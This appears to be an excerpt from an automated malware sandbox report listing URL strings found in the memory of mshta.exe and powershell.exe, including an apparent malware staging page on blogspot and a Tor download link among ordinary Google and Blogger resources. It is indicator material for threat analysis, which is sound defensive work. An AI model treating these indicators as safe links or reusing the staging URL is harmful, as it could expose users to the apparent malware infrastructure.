Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308484243.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221567445.0000000003B49000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmp | String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264173240.00000000057E2000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$
              Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlH
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
              Source: mshta.exe, 00000006.00000003.2241524951.000000000306E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758
              Source: mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758QV
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2264656702.0000000005790000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a384-
              Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/feeds/9116518222795791100/posts/default
              Source: mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/adspersonalization
              Source: mshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/blogspot-cookies
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/buzz
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/contentpolicy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/devapi
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/devforum
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/discuss
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/helpcenter
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/privacy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/terms
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/tutorials
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspng
              Source: mshta.exe, 00000006.00000003.2264609291.00000000057CD000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngom%2Fp%2Fst2222.ht
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngv
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngx
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=penci
              Source: mshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/rpc_relay.html
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=em
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=fa
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=tw
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.js
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsT
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsn
              Source: mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3767
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js06G
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssG
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssEV
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQV
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.js
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jsY
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jseflate
              Source: mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/unvisited-link-
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsZ
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsal
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsttps%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/s
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/CO
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.css
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.cssM
              Source: mshta.exe, 00000006.00000002.2309877256.00000000080A2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.cssg
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/css/maia.cssgspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264365340.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
              Source: mshta.exe, 00000006.00000003.2261840668.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.TCoB7ee77HA.O/rt=j/m=q_d
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.1KF06_f2niE.L.X.O/m=qawd
              Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com
              Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

              System Summary:
